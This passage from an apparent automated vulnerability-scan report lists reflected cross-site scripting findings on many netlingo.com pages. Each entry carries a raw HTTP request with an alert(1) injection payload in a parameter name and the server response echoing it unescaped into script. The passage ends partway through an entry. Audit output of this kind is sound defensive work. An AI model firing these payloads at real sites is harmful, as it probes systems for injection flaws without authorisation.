The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9cc3"-alert(1)-"7db72ba4b6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iphone/index.php?a9cc3"-alert(1)-"7db72ba4b6a=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32416


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><!--Programming, Authoring, and Design by Erin Jansen and Vincent James, NetLingo.com is copyrighted and trademarked -->
<head>
<
...[SNIP]...
_open_new('http://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           $("#send_page").click(function() {
                               data    =    "page_name=/iphone/index.php?a9cc3"-alert(1)-"7db72ba4b6a=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1282. http://www.netlingo.com/legal/copyright.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /legal/copyright.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42784"-alert(1)-"9e71023a44f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /legal/copyright.php?42784"-alert(1)-"9e71023a44f=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 55220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/legal/copyright.php?42784"-alert(1)-"9e71023a44f=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1283. http://www.netlingo.com/more/adsizes.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /more/adsizes.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38385"-alert(1)-"5142c59f27b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /more/adsizes.php?38385"-alert(1)-"5142c59f27b=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 29504


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><!--Programming, Authoring, and Design by Erin Jansen and Vincent James, NetLingo.com is copyrighted and trademarked -->
<head>
...[SNIP]...
_open_new('http://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           $("#send_page").click(function() {
                               data    =    "page_name=/more/adsizes.php?38385"-alert(1)-"5142c59f27b=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1284. http://www.netlingo.com/press/about-netlingo.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /press/about-netlingo.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39c6c"-alert(1)-"4c301758d1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /press/about-netlingo.php?39c6c"-alert(1)-"4c301758d1d=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 74664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
w.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/press/about-netlingo.php?39c6c"-alert(1)-"4c301758d1d=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1285. http://www.netlingo.com/press/all-press-clippings.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /press/all-press-clippings.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88732"-alert(1)-"9b04fa3131a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /press/all-press-clippings.php?88732"-alert(1)-"9b04fa3131a=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 82372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
lingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/press/all-press-clippings.php?88732"-alert(1)-"9b04fa3131a=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1286. http://www.netlingo.com/press/awards.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /press/awards.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb457"-alert(1)-"78642e65f3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /press/awards.php?cb457"-alert(1)-"78642e65f3e=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 33493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
ttp://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/press/awards.php?cb457"-alert(1)-"78642e65f3e=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1287. http://www.netlingo.com/press/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /press/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25ead"-alert(1)-"6002bc417dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /press/index.php?25ead"-alert(1)-"6002bc417dd=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:56:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 33861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
http://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/press/index.php?25ead"-alert(1)-"6002bc417dd=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1288. http://www.netlingo.com/press/media.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /press/media.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7494b"-alert(1)-"aca1aad8f53 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /press/media.php?7494b"-alert(1)-"aca1aad8f53=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:56:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 69742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
http://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/press/media.php?7494b"-alert(1)-"aca1aad8f53=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1289. http://www.netlingo.com/press/meet-erin.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /press/meet-erin.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94100"-alert(1)-"4246afee04b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /press/meet-erin.php?94100"-alert(1)-"4246afee04b=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 38917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/press/meet-erin.php?94100"-alert(1)-"4246afee04b=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1290. http://www.netlingo.com/press/print.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /press/print.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcc70"-alert(1)-"b266cbdc811 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /press/print.php?dcc70"-alert(1)-"b266cbdc811=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 101192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
http://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/press/print.php?dcc70"-alert(1)-"b266cbdc811=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1291. http://www.netlingo.com/press/teen-text-talk.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /press/teen-text-talk.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0cd2"-alert(1)-"e3f47516864 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /press/teen-text-talk.php?c0cd2"-alert(1)-"e3f47516864=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:55:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
w.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/press/teen-text-talk.php?c0cd2"-alert(1)-"e3f47516864=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1292. http://www.netlingo.com/press/web.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /press/web.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 849cd"-alert(1)-"25cb54c5360 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /press/web.php?849cd"-alert(1)-"25cb54c5360=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 80118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
('http://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/press/web.php?849cd"-alert(1)-"25cb54c5360=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1293. http://www.netlingo.com/shop/netlingo-the-dictionary.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /shop/netlingo-the-dictionary.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70646"-alert(1)-"3e8ab8b7fa9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shop/netlingo-the-dictionary.php?70646"-alert(1)-"3e8ab8b7fa9=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 36573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
go.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/shop/netlingo-the-dictionary.php?70646"-alert(1)-"3e8ab8b7fa9=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1294. http://www.netlingo.com/shop/netlingo-the-list.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /shop/netlingo-the-list.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ec45"-alert(1)-"79eca35260a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shop/netlingo-the-list.php?1ec45"-alert(1)-"79eca35260a=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 35889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/shop/netlingo-the-list.php?1ec45"-alert(1)-"79eca35260a=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1295. http://www.netlingo.com/shop/online-store.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /shop/online-store.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1279"-alert(1)-"03ee14891db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shop/online-store.php?c1279"-alert(1)-"03ee14891db=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 43538

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
/www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/shop/online-store.php?c1279"-alert(1)-"03ee14891db=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1296. http://www.netlingo.com/tips/color-guide.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /tips/color-guide.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b707"-alert(1)-"b4a703bddf1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tips/color-guide.php?2b707"-alert(1)-"b4a703bddf1=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 51461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
//www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/tips/color-guide.php?2b707"-alert(1)-"b4a703bddf1=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1297. http://www.netlingo.com/tips/cyber-safety-statistics.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /tips/cyber-safety-statistics.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3c88"-alert(1)-"cee57c976f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tips/cyber-safety-statistics.php?e3c88"-alert(1)-"cee57c976f=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 38336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
go.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/tips/cyber-safety-statistics.php?e3c88"-alert(1)-"cee57c976f=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1298. http://www.netlingo.com/tips/file-extensions.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /tips/file-extensions.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e085"-alert(1)-"e00943c83cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tips/file-extensions.php?8e085"-alert(1)-"e00943c83cd=1 HTTP/1.1
